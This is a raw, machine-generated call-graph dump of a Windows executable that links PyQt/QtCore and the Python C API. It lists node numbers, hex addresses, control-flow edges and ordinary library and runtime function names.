PyEval_SaveThread 7685->7687 7688 7ffb02f4a4f2 ?writeData@QSaveFile@@MEAA_JPEBD_J 7687->7688 7689 7ffb02f4a4fa 7687->7689 7690 7ffb02f4a503 PyEval_RestoreThread PyLong_FromLongLong 7688->7690 7689->7690 7691 7ffb02f72450 7692 7ffb02f7246a 7691->7692 7693 7ffb02f72472 7692->7693 7694 7ffb02f72478 ?pattern@QRegExp@@QEBA?AVQString@ 7692->7694 7695 7ffb0305f390 7694->7695 7696 7ffb02f72493 ??1QString@@QEAA 7695->7696 7697 7ffb02f724aa PyUnicode_FromFormat ?patternOptions@QRegularExpression@@QEBA?AV?$QFlags@W4PatternOption@QRegularExpression@@@ 7696->7697 7698 7ffb02f72535 7696->7698 7699 7ffb02f724d2 ?patternOptions@QRegularExpression@@QEBA?AV?$QFlags@W4PatternOption@QRegularExpression@@@ PyUnicode_FromFormat 7697->7699 7700 7ffb02f724fc PyUnicode_FromString 7697->7700 7702 7ffb03055e00 7699->7702 7701 7ffb02f72516 7700->7701 7703 7ffb02f7251c _Py_Dealloc 7701->7703 7704 7ffb02f72525 7701->7704 7702->7700 7703->7704 7705 7ffb02f1e450 7706 7ffb02f1e470 7705->7706 7707 7ffb02f1e455 ??1?$QVector@VQPointF@@@@QEAA 7705->7707 7707->7706 7708 7ff60b139ccc 7710 7ff60b139cea 7708->7710 7712 7ff60b140338 LeaveCriticalSection 7710->7712 7713 7ffb02f34450 PyObject_GetIter 7714 7ffb02f34480 PyErr_Clear 7713->7714 7715 7ffb02f344c7 7713->7715 7716 7ffb02f3448b 7714->7716 7717 7ffb02f344aa 7714->7717 7718 7ffb03062300 2 API calls 7715->7718 7725 7ffb02f346fa 7715->7725 7719 7ffb02f34491 _Py_Dealloc 7716->7719 7720 7ffb02f3449a PyType_GetFlags 7716->7720 7721 7ffb02f344f7 PyErr_Clear PyIter_Next 7718->7721 7719->7720 7720->7717 7722 7ffb02f346b0 PyErr_Occurred 7721->7722 7739 7ffb02f34527 7721->7739 7723 7ffb02f347a2 7722->7723 7724 7ffb02f346bf 7722->7724 7723->7725 7726 7ffb02f347a8 _Py_Dealloc 7723->7726 7727 7ffb02f346d5 ?dispose@QListData@@SAXPEAUData@1@ 7724->7727 7728 7ffb02f346de 7724->7728 7726->7725 7727->7728 7728->7725 7732 7ffb02f346f1 _Py_Dealloc 7728->7732 7729 7ffb02f34721 PyErr_Format 7736 7ffb02f3475e 7729->7736 7737 7ffb02f34755 _Py_Dealloc 7729->7737 7730 7ffb02f34573 ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH 7730->7739 7731 7ffb02f34669 ?append@QListData@ 7731->7739 7732->7725 7734 7ffb02f3467b _Py_Dealloc 7735 7ffb02f34684 PyErr_Clear PyIter_Next 7734->7735 7735->7739 7740 7ffb02f346aa 7735->7740 7741 7ffb02f34774 ?dispose@QListData@@SAXPEAUData@1@ 7736->7741 7744 7ffb02f3477d 7736->7744 7737->7736 7738 7ffb02f345d1 memcpy 7738->7739 7739->7729 7739->7730 7739->7731 7739->7734 7739->7735 7739->7738 7742 7ffb02f3461b memcpy 7739->7742 7743 7ffb02f34642 ?dispose@QListData@@SAXPEAUData@1@ 7739->7743 7740->7722 7741->7744 7742->7739 7743->7739 7744->7725 7745 7ffb02f34794 _Py_Dealloc 7744->7745 7745->7725 7749 7ffb02fd4450 7750 7ffb02fd4492 7749->7750 7751 7ffb02fd4496 ?deadlineNSecs@QDeadlineTimer@ PyLong_FromLongLong 7750->7751 7752 7ffb02fd44af 7750->7752 7753 7ffb03006450 7754 7ffb0300646e 7753->7754 7755 7ffb0300656c 7754->7755 7756 7ffb03062300 2 API calls 7754->7756 7757 7ffb030064ea 7756->7757 7758 7ffb03006501 ?mapSelectionToSource@QIdentityProxyModel@@UEBA?AVQItemSelection@@AEBV2@ ??0QItemSelection@@QEAA@$$QEAV0@ 7757->7758 7759 7ffb0300651f ??0QItemSelection@@QEAA@$$QEAV0@ 7757->7759 7760 7ffb0300653e ??1?$QList@VQItemSelectionRange@@@@QEAA 7758->7760 7759->7760 7762 7ffb03006561 7760->7762 7763 7ffb02f98450 7764 7ffb02f98497 7763->7764 7765 7ffb02f9849c ?mapToSource@QTransposeProxyModel@@UEBA?AVQModelIndex@@AEBV2@ 7764->7765 7766 7ffb02f984ad 7764->7766 7765->7766 7767 7ffb02fb8450 7768 7ffb02fb84a2 7767->7768 7769 7ffb02fb84a6 ?inherits@QObject@@QEBA_NPEBD 7768->7769 7772 7ffb02fb84e1 7768->7772 7770 7ffb02fb84c9 _Py_Dealloc 7769->7770 7771 7ffb02fb84cf PyBool_FromLong 7769->7771 7770->7771 7773 7ffb02fba450 7774 7ffb02fba492 7773->7774 7775 7ffb02fba496 ?endInsertColumns@QAbstractItemModel@ 7774->7775 7776 7ffb02fba4b7 7774->7776 7777 7ffb02fb0450 7778 7ffb02fb049a 7777->7778 7779 7ffb02fb04c3 7778->7779 7780 7ffb02fb049e ?truncate@QBitArray@@QEAAXH 7778->7780 7785 7ffb02f68460 7788 7ffb02f684a1 7785->7788 7786 7ffb02f68530 7787 7ffb02f68522 PyBool_FromLong 7788->7786 7788->7787 7789 7ff60b13c520 7790 7ff60b13c530 7789->7790 7795 7ff60b138368 7790->7795 7794 7ff60b13c539 7801 7ff60b140338 LeaveCriticalSection 7794->7801 7796 7ff60b138387 7795->7796 7800 7ff60b1383b0 7795->7800 7797 7ff60b13838c _invalid_parameter_noinfo 7796->7797 7798 7ff60b13839a 7797->7798 7798->7794 7802 7ff60b140338 LeaveCriticalSection 7800->7802 7803 7ffb02fd2460 7804 7ffb02fd248b 7803->7804 7805 7ffb02fd248f ?setSetuidAllowed@QCoreApplication@@SAX_N 7804->7805 7806 7ffb02fd24b0 7804->7806 7811 7ffb02ff0460 7812 7ffb02ff0669 7811->7812 7813 7ffb02ff07e8 7812->7813 7814 7ffb02ff0671 PyEval_SaveThread ?invoke@QMetaMethod@@QEBA_NPEAVQObject@@W4ConnectionType@Qt@@VQGenericReturnArgument@@VQGenericArgument@@333333333 PyEval_RestoreThread 7812->7814 7817 7ffb02ff0a03 PyEval_SaveThread ?invoke@QMetaMethod@@QEBA_NPEAVQObject@@W4ConnectionType@Qt@@VQGenericReturnArgument@@VQGenericArgument@@333333333 PyEval_RestoreThread 7813->7817 7818 7ffb02ff0b2e 7813->7818 7815 7ffb02ff07c9 PyErr_SetString 7814->7815 7816 7ffb02ff07b8 7814->7816 7815->7816 7817->7815 7817->7816 7819 7ffb02ff0d3a PyEval_SaveThread ?invoke@QMetaMethod@@QEBA_NPEAVQObject@@W4ConnectionType@Qt@@VQGenericReturnArgument@@VQGenericArgument@@333333333 PyEval_RestoreThread 7818->7819 7820 7ffb02ff0e6b 7818->7820 7819->7815 7819->7816 7820->7816 7821 7ffb02ff105b PyEval_SaveThread 7820->7821 7821->7816 7822 7ff60b12f524 7823 7ff60b12fc90 __std_exception_copy _invalid_parameter_noinfo 7822->7823 7824 7ff60b12f54d 7823->7824 7825 7ff60b137d24 7826 7ff60b137d98 7825->7826 7827 7ff60b137d4d memcpy_s 7825->7827 7827->7826 7828 7ff60b137dca _invalid_parameter_noinfo 7827->7828 7828->7826 7829 7ffb02f9a460 7830 7ffb02f9a496 7829->7830 7831 7ffb02f9a49b ?pos@QFileDevice@ 7830->7831 7832 7ffb02f9a4af 7830->7832 7833 7ffb02fc4460 7834 7ffb02fc44a2 7833->7834 7835 7ffb02fc44a6 ?isRelative@QDir@ PyBool_FromLong 7834->7835 7836 7ffb02fc44c2 7834->7836 7837 7ffb02fac460 7838 7ffb02fac4a2 7837->7838 7839 7ffb02fac4a6 ?startTransaction@QIODevice@ 7838->7839 7840 7ffb02fac4c7 7838->7840 7841 7ffb02fb6460 7842 7ffb02fb64ae 7841->7842 7843 7ffb02fb64b2 ?removeEventFilter@QObject@@QEAAXPEAV1@ 7842->7843 7844 7ffb02fb64d8 7842->7844 7845 7ffb02f7e470 7846 7ffb02f7e4cf 7845->7846 7847 7ffb02f7e520 7846->7847 7848 7ffb02f7e4d3 ?setStringList@QStringListModel@@QEAAXAEBVQStringList@@ 7846->7848 7849 7ffb02f7e50a 7848->7849 7850 7ffb02f82470 7851 7ffb02f824b2 7850->7851 7852 7ffb02f824cb 7851->7852 7853 7ffb02f824b6 PyFloat_FromDouble 7851->7853 7862 7ffb02f28470 7863 7ffb02f284b2 7862->7863 7864 7ffb02f284b6 ?endArray@QSettings@ 7863->7864 7865 7ffb02f284d7 7863->7865 7866 7ffb02fc8470 7867 7ffb02fc84b3 7866->7867 7868 7ffb02fc8479 7866->7868 7868->7867 7869 7ffb02fc84a0 ??1QItemSelectionRange@@QEAA 7868->7869 7869->7867 7869->7869 7870 7ffb02ff4470 7871 7ffb03062300 2 API calls 7870->7871 7872 7ffb02ff448a ??0QJsonDocument@@QEAA@AEBV0@ 7871->7872 7877 7ff60b142534 7883 7ff60b142557 7877->7883 7878 7ff60b142561 7879 7ff60b1425d3 7878->7879 7885 7ff60b13a504 7878->7885 7883->7878 7884 7ff60b140338 LeaveCriticalSection 7883->7884 7886 7ff60b13a50d 7885->7886 7887 7ff60b13a525 IsProcessorFeaturePresent 7886->7887 7888 7ff60b13a534 7886->7888 7887->7888 7889 7ffb02f7c480 7890 7ffb02f7c4aa 7889->7890 7891 7ffb02f7c5c0 PyBool_FromLong 7890->7891 7892 7ffb02f7c5b8 ?setData@QStringListModel@@UEAA_NAEBVQModelIndex@@AEBVQVariant@@H 7890->7892 7893 7ffb02f7c602 7890->7893 7892->7891 7895 7ffb02f76480 7896 7ffb02f764c2 7895->7896 7897 7ffb02f764df 7896->7897 7898 7ffb02f764c6 ?isEmpty@QRegExp@ PyBool_FromLong 7896->7898 7899 7ffb02f24480 7900 7ffb02f244d5 7899->7900 7901 7ffb03062300 2 API calls 7900->7901 7903 7ffb02f24515 7900->7903 7902 7ffb02f244e3 ?marginsRemoved@QRect@@QEBA?AV1@AEBVQMargins@@ 7901->7902 7904 7ffb02f24510 7902->7904 7905 7ffb03008490 7906 7ffb030084c5 7905->7906 7907 7ffb030084f8 7906->7907 7908 7ffb030084e0 ??0QEventTransition@@QEAA@PEAVQState@@ 7906->7908 7908->7907 7908->7908 7909 7ffb02f32480 7910 7ffb02f32512 7909->7910 7911 7ffb02f3260b 7910->7911 7912 7ffb02f3251a 7910->7912 7914 7ffb02f325fb 7911->7914 7916 7ffb02f32662 ?dispose@QListData@@SAXPEAUData@1@ 7911->7916 7917 7ffb02f32650 ??1QString@@QEAA 7911->7917 7913 7ffb03062300 2 API calls 7912->7913 7915 7ffb02f3252c ?findExecutable@QStandardPaths@@SA?AVQString@@AEBV2@AEBVQStringList@@ 7913->7915 7918 7ffb02f3255d 7915->7918 7916->7914 7917->7916 7917->7917 7918->7914 7919 7ffb02f325f2 ?dispose@QListData@@SAXPEAUData@1@ 7918->7919 7920 7ffb02f325e0 ??1QString@@QEAA 7918->7920 7919->7914 7920->7919 7920->7920 7929 7ffb02faa480 7930 7ffb02faa4a4 PyType_IsSubtype 7929->7930 7935 7ffb02faa4cd 7929->7935 7931 7ffb02faa4b1 7930->7931 7930->7935 7932 7ffb02faa593 7933 7ffb02faa524 7934 7ffb02faa563 7934->7932 7937 7ffb02faa56c PyErr_Clear 7934->7937 7935->7932 7935->7933 7935->7934 7936 7ffb02faa558 _Py_Dealloc 7935->7936 7936->7934 7942 7ffb0305c480 ??0QObject@@QEAA@PEAV0@ ??0Connection@QMetaObject@@QEAA ??0QByteArray@@QEAA@AEBV0@ PyGILState_Ensure 7943 7ffb03062300 2 API calls 7942->7943 7944 7ffb0305c4ed 7943->7944 7945 7ffb0305c4fb 13 API calls 7944->7945 7946 7ffb0305c5dd ?lock@QMutex@ 7945->7946 7947 7ffb0305c746 ??1QMetaObjectBuilder@@UEAA 7945->7947 7948 7ffb0305c655 7946->7948 7949 7ffb0305c5f9 ?detach_helper@QHashData@@QEAAPEAU1@P6AXPEAUNode@1@PEAX@ZP6AX0@ZHH 7946->7949 7951 7ffb0305c66d ?rehash@QHashData@@QEAAXH 7948->7951 7953 7ffb0305c683 ?allocateNode@QHashData@@QEAAPEAXH ?unlock@QMutex@ ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@ ??1Connection@QMetaObject@@QEAA 7948->7953 7950 7ffb0305c641 ?free_helper@QHashData@@QEAAXP6AXPEAUNode@1@@Z 7949->7950 7952 7ffb0305c633 7949->7952 7950->7948 7951->7953 7952->7948 7952->7950 7953->7947 7965 7ffb03052480 7966 7ffb0305249e 7965->7966 7979 7ffb03052647 7965->7979 7968 7ffb030524ad 7966->7968 7969 7ffb0305253d ?userType@QVariant@ 7966->7969 7971 7ffb030524de ?type@QVariant@@QEBA?AW4Type@1 7966->7971 7967 7ffb030526a1 ?constData@QVariant@ 7970 7ffb030526e0 7967->7970 7972 7ffb0305257d 7969->7972 7973 7ffb0305254d ?userType@QVariant@ PyErr_Format 7969->7973 7974 7ffb0305276b 7970->7974 7975 7ffb030526f9 7970->7975 7971->7969 7978 7ffb030524ec ?toMap@QVariant@@QEBA?AV?$QMap@VQString@@VQVariant@@@ 7971->7978 7972->7979 7980 7ffb03052589 7972->7980 7984 7ffb03052a92 7974->7984 7985 7ffb03052afc ?indexOf@QByteArray@@QEBAHPEBDH 7974->7985 7993 7ffb03052796 7974->7993 7976 7ffb030526ff ?endsWith@QByteArray@@QEBA_ND 7975->7976 7977 7ffb0305270f 7975->7977 7976->7977 7981 7ffb0305275c 7977->7981 7982 7ffb0305273a PyErr_SetString 7977->7982 7995 7ffb03052502 7978->7995 7979->7967 7983 7ffb030526c1 7979->7983 7986 7ffb0305258e ?userType@QVariant@ 7980->7986 7988 7ffb03052aa0 ?endsWith@QByteArray@@QEBA_ND 7984->7988 7984->7993 7987 7ffb03052b32 ?endsWith@QByteArray@@QEBA_ND 7985->7987 7985->7993 7990 7ffb0305259d ?constData@QVariant@ 7986->7990 7991 7ffb030525b5 7986->7991 7992 7ffb03052b5b ?constData@QByteArray@ PyErr_Format 7987->7992 7987->7993 7989 7ffb03052ab7 ?create@QMetaType@@SAPEAXHPEBX 7988->7989 7988->7993 7997 7ffb03052ae0 7989->7997 7994 7ffb030525b3 7990->7994 7998 7ffb030525bf ?convert@QVariant@@QEBA_NHPEAX 7991->7998 7996 7ffb03052b80 7992->7996 7993->7992 7993->7996 8000 7ffb030525fd PyErr_SetString 7994->8000 8001 7ffb0305262a 7994->8001 7997->7996 7999 7ffb03052aec ?destroy@QMetaType@@SAXHPEAX 7997->7999 7998->7994 7999->7992 8002 7ffb03052620 8000->8002 6481 7ffb02f72090 6482 7ffb02f720de 6481->6482 6483 7ffb02f720e2 _Py_NoneStruct 6482->6483 6484 7ffb02f72108 6482->6484 6485 7ffb02f720f1 6483->6485 6486 7ffb02f72150 6484->6486 6487 7ffb02f72143 ?start@QTimer@ 6484->6487 6487->6485 8003 7ffb02f14490 8004 7ffb02f144b0 8003->8004 8005 7ffb02f1452b ?onEntry@QState@@MEAAXPEAVQEvent@@ 8004->8005 8006 7ffb02f14533 8004->8006 8005->8006 8007 7ffb02f2e490 8008 7ffb02f2e4a8 8007->8008 8009 7ffb02f2e4ad 8008->8009 8010 7ffb02f2e4b2 ?toString@QUrl@@QEBA?AVQString@@V?$QUrlTwoFlags@W4UrlFormattingOption@QUrl@@W4ComponentFormattingOption@2@@@ 8008->8010 8011 7ffb0305f390 8010->8011 8012 7ffb02f2e4d7 ??1QString@@QEAA 8011->8012 8013 7ffb02f2e50c 8012->8013 8014 7ffb02f2e4ea PyUnicode_FromFormat 8012->8014 8014->8013 8015 7ffb02f2e503 _Py_Dealloc 8014->8015 8015->8013 8016 7ff60b13ed10 8017 7ff60b13ed68 8016->8017 8018 7ff60b13ed6d 8016->8018 8017->8018 8019 7ff60b13ed9d LoadLibraryExW 8017->8019 8020 7ff60b13ee92 GetProcAddress 8017->8020 8024 7ff60b13edfc LoadLibraryExW 8017->8024 8021 7ff60b13ee72 8019->8021 8022 7ff60b13edc2 GetLastError 8019->8022 8020->8018 8021->8020 8023 7ff60b13ee89 FreeLibrary 8021->8023 8022->8017 8023->8020 8024->8017 8024->8021 8025 7ffb03002490 8026 7ffb030024d2 8025->8026 8027 7ffb030024d6 PyEval_SaveThread ?beginResetModel@QAbstractItemModel@ PyEval_RestoreThread 8026->8027 8028 7ffb03002513 8026->8028 8029 7ffb03004490 8030 7ffb030044b3 8029->8030 8031 7ffb0300459b 8030->8031 8032 7ffb03062300 2 API calls 8030->8032 8033 7ffb0300452e 8032->8033 8034 7ffb03004545 ?mapToSource@QIdentityProxyModel@@UEBA?AVQModelIndex@@AEBV2@ 8033->8034 8035 7ffb03004552 8033->8035 8034->8035 8036 7ffb02ff2490 8037 7ffb02ff24da 8036->8037 8038 7ffb02ff2503 8037->8038 8039 7ffb02ff24de ?setOffsetFromUtc@QDateTime@@QEAAXH 8037->8039 8040 7ff60b130d14 8041 7ff60b130d41 8040->8041 8043 7ff60b130d53 8040->8043 8042 7ff60b130d46 _invalid_parameter_noinfo 8041->8042 8045 7ff60b130d60 8042->8045 8044 7ff60b130e48 8043->8044 8043->8045 8046 7ff60b130e3b _invalid_parameter_noinfo 8043->8046 8044->8045 8047 7ff60b130ef0 _invalid_parameter_noinfo 8044->8047 8046->8044 8047->8045 8052 7ffb02f5e2a0 8053 7ffb02f5e2a5 ??1QDateTime@@QEAA ??1QString@@QEAA 8052->8053 8054 7ffb02f5e2cd 8052->8054 8053->8054 8055 7ffb02f4e2a0 8056 7ffb02f4e2c9 8055->8056 8057 7ffb02f4e2d1 8056->8057 8058 7ffb02f4e31b ??8QXmlStreamEntityDeclaration@@QEBA_NAEBV0@ PyBool_FromLong 8056->8058 8059 7ffb02f4e345 8056->8059 8060 7ffb02f4e35b 8059->8060 8061 7ffb02f4e355 _Py_Dealloc 8059->8061 8061->8060 8062 7ffb02f502a0 8063 7ffb02f502fd 8062->8063 8064 7ffb02f50355 8063->8064 8065 7ffb03062300 2 API calls 8063->8065 8066 7ffb02f50310 ??0QTransposeProxyModel@@QEAA@PEAVQObject@@ 8065->8066 8067 7ffb02f7e2a0 8068 7ffb02f7e2e4 8067->8068 8069 7ffb02f7e300 8068->8069 8070 7ffb02f7e2e8 8068->8070 8073 7ffb02f7e398 8069->8073 8076 7ffb02f7e3e7 8069->8076 8071 7ffb03062300 2 API calls 8070->8071 8072 7ffb02f7e2f2 ??0QRegExp@@QEAA 8071->8072 8077 7ffb02f7e3e2 8072->8077 8074 7ffb03062300 2 API calls 8073->8074 8075 7ffb02f7e3a2 ??0QRegExp@@QEAA@AEBVQString@@W4CaseSensitivity@Qt@@W4PatternSyntax@0@ 8074->8075 8075->8077 8076->8077 8078 7ffb03062300 2 API calls 8076->8078 8079 7ffb02f7e43d ??0QRegExp@@QEAA@AEBV0@ 8078->8079 8079->8077 8080 7ffb02f6a2a0 8081 7ffb02f6a2e2 8080->8081 8082 7ffb02f6a322 8081->8082 8083 7ffb03062300 2 API calls 8081->8083 8084 7ffb02f6a2f0 ?commonPrefix@QVersionNumber@@SA?AV1@AEBV1@0 8083->8084 8085 7ffb02f6a31d 8084->8085 8086 7ffb02f362a0 8087 7ffb03062300 2 API calls 8086->8087 8088 7ffb02f362ba ??0QRandomGenerator@@QEAA@AEBV0@ 8087->8088 8089 7ff60b13d360 8090 7ff60b13d372 8089->8090 8091 7ff60b13d376 8089->8091 8091->8090 8092 7ff60b13d399 SetFilePointerEx 8091->8092 8092->8090 8093 7ff60b13d3b3 GetFileSizeEx 8092->8093 8093->8090 8094 7ffb02fd22a0 8095 7ffb02fd22e2 8094->8095 8096 7ffb02fd22e6 ?hasExpired@QDeadlineTimer@ PyBool_FromLong 8095->8096 8097 7ffb02fd22ff 8095->8097 8098 7ffb02f9a2a0 8099 7ffb02f9a2de 8098->8099 8100 7ffb02f9a2e3 ?permissions@QFileDevice@@UEBA?AV?$QFlags@W4Permission@QFileDevice@@@ 8099->8100 8101 7ffb02f9a302 8099->8101 8105 7ffb02fc02a0 8106 7ffb02fc02e2 8105->8106 8107 7ffb02fc02e6 ?parent@QObject@@QEBAPEAV1 8106->8107 8108 7ffb02fc0310 8106->8108 8109 7ffb02fc030b 8107->8109 8113 7ffb02f842b0 8114 7ffb02f8430f 8113->8114 8115 7ffb02f84360 8114->8115 8116 7ffb02f84313 ?removeQueryItem@QUrlQuery@@QEAAXAEBVQString@@ 8114->8116 8117 7ffb02f8434a 8116->8117 8118 7ffb02f6c2b0 8119 7ffb02f6c2f2 8118->8119 8120 7ffb02f6c320 8119->8120 8121 7ffb02f6c2f6 ?instance@QPluginLoader@@QEAAPEAVQObject@ 8119->8121 8122 7ffb02f6c31b 8121->8122 8123 7ffb02f182b0 8124 7ffb02f1831d 8123->8124 8125 7ffb02f18325 8124->8125 8126 7ffb02f183b1 8124->8126 8128 7ffb03062300 2 API calls 8125->8128 8127 7ffb02f183d4 8126->8127 8129 7ffb02f183c9 _Py_Dealloc 8126->8129 8130 7ffb02f1832f 8128->8130 8129->8127 8131 7ffb02f1a2b0 8132 7ffb02f1a30f 8131->8132 8133 7ffb02f1a313 ?setKey@QSharedMemory@@QEAAXAEBVQString@@ 8132->8133 8135 7ffb02f1a360 8132->8135 8134 7ffb02f1a34a 8133->8134 8136 7ff60b149368 8137 7ff60b14939a 8136->8137 8138 7ff60b149386 8136->8138 8140 7ff60b1493b5 8137->8140 8141 7ff60b1493ab _set_statfp 8137->8141 8138->8137 8139 7ff60b14938b _set_statfp 8138->8139 8147 7ff60b1493ee 8139->8147 8143 7ff60b1493c2 _set_statfp 8140->8143 8144 7ff60b1493d1 8140->8144 8141->8147 8142 7ff60b14940b 8143->8147 8146 7ff60b1493e4 _set_statfp 8144->8146 8144->8147 8145 7ff60b1493fe _set_statfp 8145->8142 8146->8147 8147->8142 8147->8145 8148 7ffb02fd82b0 8149 7ffb02fd82fa 8148->8149 8150 7ffb02fd82fe ?monthsInYear@QCalendar@@QEBAHH PyLong_FromLong 8149->8150 8151 7ffb02fd831a 8149->8151 8152 7ffb02fe82b0 8153 7ffb02fe831a 8152->8153 8154 7ffb02fe836e 8153->8154 8155 7ffb02fe831e PyEval_SaveThread ?copy@QFile@@QEAA_NAEBVQString@@ PyEval_RestoreThread 8153->8155 8157 7ffb02fe83c3 PyEval_SaveThread ?copy@QFile@@SA_NAEBVQString@@0 PyEval_RestoreThread 8154->8157 8158 7ffb02fe8410 8154->8158 8159 7ffb02fe8349 PyBool_FromLong 8155->8159 8157->8159 8160 7ffb02f8a2b0 8161 7ffb02f8a2e5 8160->8161 8162 7ffb02f8a2f4 ??0QStorageInfo@@QEAA 8161->8162 8163 7ffb02f8a307 8161->8163 8162->8162 8162->8163 8164 7ffb02f962b0 8165 7ffb02f962f7 8164->8165 8166 7ffb02f962fc ?setHeaderData@QAbstractItemModel@@UEAA_NHW4Orientation@Qt@@AEBVQVariant@@H 8165->8166 8167 7ffb02f9630d 8165->8167 8166->8167 8168 7ffb02fba2b0 8169 7ffb02fba2f2 8168->8169 8170 7ffb02fba32d 8169->8170 8171 7ffb03062300 2 API calls 8169->8171 8172 7ffb02fba300 ?filePath@QFileInfo@@QEBA?AVQString@ 8171->8172 8173 7ffb02fba328 8172->8173 8174 7ffb02f602c0 8175 7ffb02f602f5 8174->8175 8176 7ffb02f60317 8175->8176 8177 7ffb02f60304 ??0QTemporaryDir@@QEAA 8175->8177 8177->8176 8177->8177 8178 7ffb02f4a2c0 8179 7ffb02f4a2ef 8178->8179 8180 7ffb02f4a41c 8179->8180 8181 7ffb02f4a3e0 PyBool_FromLong 8179->8181 8182 7ffb02f4a3d8 ?setHeaderData@QTransposeProxyModel@@UEAA_NHW4Orientation@Qt@@AEBVQVariant@@H 8179->8182 8182->8181 8184 7ffb02f4c2c0 8185 7ffb02f4c30e 8184->8185 8186 7ffb02f4c312 ?setStandardOutputProcess@QProcess@@QEAAXPEAV1@ 8185->8186 8187 7ffb02f4c338 8185->8187 8188 7ff60b14533c 8189 7ff60b14535d memcpy_s 8188->8189 8190 7ff60b145359 8188->8190 8189->8190 8191 7ff60b14536c _invalid_parameter_noinfo 8189->8191 8191->8190 8192 7ffb030102d0 8193 7ffb030102f0 8192->8193 8194 7ffb03010381 ?setSourceModel@QAbstractProxyModel@@UEAAXPEAVQAbstractItemModel@@ 8193->8194 8195 7ffb03010389 8193->8195 8194->8195 8196 7ffb02f422c0 8197 7ffb02f42399 8196->8197 8198 7ffb02f423a1 ?start@QProcess@@QEAAXAEBVQString@@AEBVQStringList@@V?$QFlags@W4OpenModeFlag@QIODevice@@@@ 8197->8198 8199 7ffb02f42424 8197->8199 8200 7ffb02f423d6 8198->8200 8201 7ffb02f424eb 8199->8201 8202 7ffb02f424c6 ?start@QProcess@@QEAAXAEBVQString@@V?$QFlags@W4OpenModeFlag@QIODevice@@@@ 8199->8202 8201->8200 8203 7ffb02f4256c ?start@QProcess@@QEAAXV?$QFlags@W4OpenModeFlag@QIODevice@@@@ 8201->8203 8202->8201 8203->8200 8204 7ffb02f3a2c0 8205 7ffb03062300 2 API calls 8204->8205 8206 7ffb02f3a2da ??0QRegularExpression@@QEAA@AEBV0@ 8205->8206 8211 7ffb02fb42c0 8212 7ffb02fb4315 8211->8212 8213 7ffb02fb4319 ?moveToThread@QObject@@QEAAXPEAVQThread@@ 8212->8213 8214 7ffb02fb433f 8212->8214 8215 7ffb02f482d0 8216 7ffb02f482f0 8215->8216 8217 7ffb02f482d5 ??1QXmlStreamReader@@QEAA 8215->8217 8217->8216 8218 7ffb02f782d0 8219 7ffb02f78331 8218->8219 8220 7ffb02f78335 ?changePersistentIndex@QAbstractItemModel@@IEAAXAEBVQModelIndex@@0 8219->8220 8221 7ffb02f78363 8219->8221 8222 7ffb02f7a2d0 8223 7ffb02f7a32f 8222->8223 8224 7ffb02f7a352 8223->8224 8225 7ffb02f7a333 ?pos@QRegExp@@QEAAHH PyLong_FromLong 8223->8225 8234 7ffb02f222d0 8235 7ffb02f22332 8234->8235 8236 7ffb02f2238d 8235->8236 8237 7ffb03062300 2 API calls 8235->8237 8238 7ffb02f22340 ?adjusted@QRect@@QEBA?AV1@HHHH 8237->8238 8239 7ffb02f22388 8238->8239 8240 7ffb02f142d0 8241 7ffb02f142f4 PyType_IsSubtype 8240->8241 8244 7ffb02f1431d 8240->8244 8242 7ffb02f14301 8241->8242 8241->8244 8243 7ffb02f1440a 8244->8243 8245 7ffb02f14380 ??IQRectF@@QEBA?AV0@AEBV0@ 8244->8245 8246 7ffb02f143b7 8244->8246 8247 7ffb02f143da 8246->8247 8248 7ffb02f143cf _Py_Dealloc 8246->8248 8247->8243 8249 7ffb02f143e3 PyErr_Clear 8247->8249 8248->8247 8250 7ff60b131b50 8251 7ff60b131b83 8250->8251 8253 7ff60b131bef 8251->8253 8254 7ff60b130b80 8251->8254 8255 7ff60b130bb7 8254->8255 8257 7ff60b130ba6 8254->8257 8256 7ff60b13d5fc _fread_nolock HeapAlloc 8255->8256 8255->8257 8256->8257 8257->8253 8258 7ff60b12cb50 8259 7ff60b12cb60 8258->8259 8262 7ff60b139ba8 8259->8262 8261 7ff60b12cb6c _RTC_Initialize 8263 7ff60b139bb9 8262->8263 8264 7ff60b139bc1 8263->8264 8265 7ff60b139bd0 _invalid_parameter_noinfo 8263->8265 8264->8261 8265->8264 8266 7ffb02ffe2d0 8267 7ffb02ffe312 8266->8267 8268 7ffb02ffe316 ?second@QTime@ PyLong_FromLong 8267->8268 8269 7ffb02ffe32e 8267->8269 8270 7ff60b122b50 8271 7ff60b12c850 8270->8271 8272 7ff60b122b74 GetCurrentProcessId 8271->8272 8273 7ff60b122bc7 8272->8273 8274 7ff60b122c10 MessageBoxW 8273->8274 8275 7ff60b122c40 8274->8275 8284 7ff60b140354 8285 7ff60b140370 8284->8285 8286 7ff60b14039f FlushFileBuffers 8285->8286 8287 7ff60b1403bb 8285->8287 8286->8287 8288 7ff60b1403ae GetLastError 8286->8288 8291 7ff60b1384f8 LeaveCriticalSection 8287->8291 8288->8287 8292 7ffb02f8e2d0 8293 7ffb02f8e2e9 8292->8293 8294 7ffb02f8e30f 8292->8294 8295 7ffb03062300 2 API calls 8293->8295 8296 7ffb02f8e2f3 8295->8296 8297 7ffb02fc22d0 8298 7ffb02fc2316 8297->8298 8299 7ffb02fc231a ?exists@QDir@ PyBool_FromLong 8298->8299 8300 7ffb02fc2337 8298->8300 8301 7ffb02fc23a3 ?exists@QDir@@QEBA_NAEBVQString@@ 8300->8301 8302 7ffb02fc23e6 8300->8302 8303 7ffb02fc23d8 PyBool_FromLong 8301->8303 8304 7ffb02fae2d0 8305 7ffb02fae322 8304->8305 8306 7ffb02fae353 8305->8306 8307 7ffb02fae34d _Py_Dealloc 8305->8307 8307->8306 8308 7ffb02f5e2e0 8309 7ffb02f5e36c ??1QSequentialAnimationGroup@@UEAA 8308->8309 8311 7ffb02f5e2f4 8308->8311 8310 7ffb02f5e378 8309->8310 6477 7ff60b13eb98 6480 7ff60b13eba9 6477->6480 6478 7ff60b13ebde HeapAlloc 6479 7ff60b13ebf8 6478->6479 6478->6480 6480->6478 6480->6479 8312 7ffb02f1e2e0 8313 7ffb03062300 2 API calls 8312->8313 8314 7ffb02f1e2fa ??0?$QVector@VQPointF@@@@QEAA@AEBV0@ 8313->8314 8315 7ffb02f3e2e0 8316 7ffb02f3e322 8315->8316 8317 7ffb02f3e35d 8316->8317 8318 7ffb03062300 2 API calls 8316->8318 8319 7ffb02f3e330 ?tokenString@QXmlStreamReader@@QEBA?AVQString@ 8318->8319 8320 7ffb02f3e358 8319->8320 8325 7ffb02ff82e0 8326 7ffb02ff8354 